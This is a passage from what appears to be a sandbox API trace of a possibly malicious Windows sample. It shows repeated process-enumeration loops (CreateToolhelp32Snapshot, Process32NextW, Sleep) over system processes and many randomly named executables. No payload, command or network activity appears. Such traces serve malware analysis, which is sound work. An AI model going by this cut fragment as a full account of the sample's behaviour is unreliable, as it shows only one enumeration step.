th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0126.789] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0126.791] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0126.792] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0126.793] CloseHandle (hObject=0xc4) returned 1 [0126.793] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0126.799] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0126.800] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0126.801] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0126.802] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0126.865] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0126.866] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0126.867] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0126.868] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0126.869] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0126.869] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0126.870] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0126.871] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0126.872] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0126.873] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0126.874] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x30, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0126.874] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0126.875] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0126.876] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0126.877] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0126.878] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0126.880] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0126.881] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0126.883] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0126.884] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0126.886] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0126.887] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0126.889] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0126.890] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0126.892] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0126.893] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0126.895] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0126.897] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0126.898] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0126.961] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0126.962] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0126.964] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0126.965] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0126.966] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0126.968] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0126.969] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0126.971] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0126.972] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0126.973] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0126.975] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0126.976] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0126.977] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0126.979] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0126.980] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0126.981] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0126.983] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0126.984] CloseHandle (hObject=0xbc) returned 1 [0126.984] Sleep (dwMilliseconds=0x12c) [0127.293] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0127.299] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0127.300] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0127.300] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0127.301] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0127.302] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0127.303] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0127.304] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0127.305] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0127.306] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0127.306] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0127.307] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0127.308] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0127.309] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0127.310] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0127.311] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x30, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0127.312] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0127.313] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0127.313] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0127.314] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0127.315] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0127.316] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0127.317] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0127.319] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0127.320] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0127.321] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0127.322] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0127.323] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0127.325] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0127.326] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, 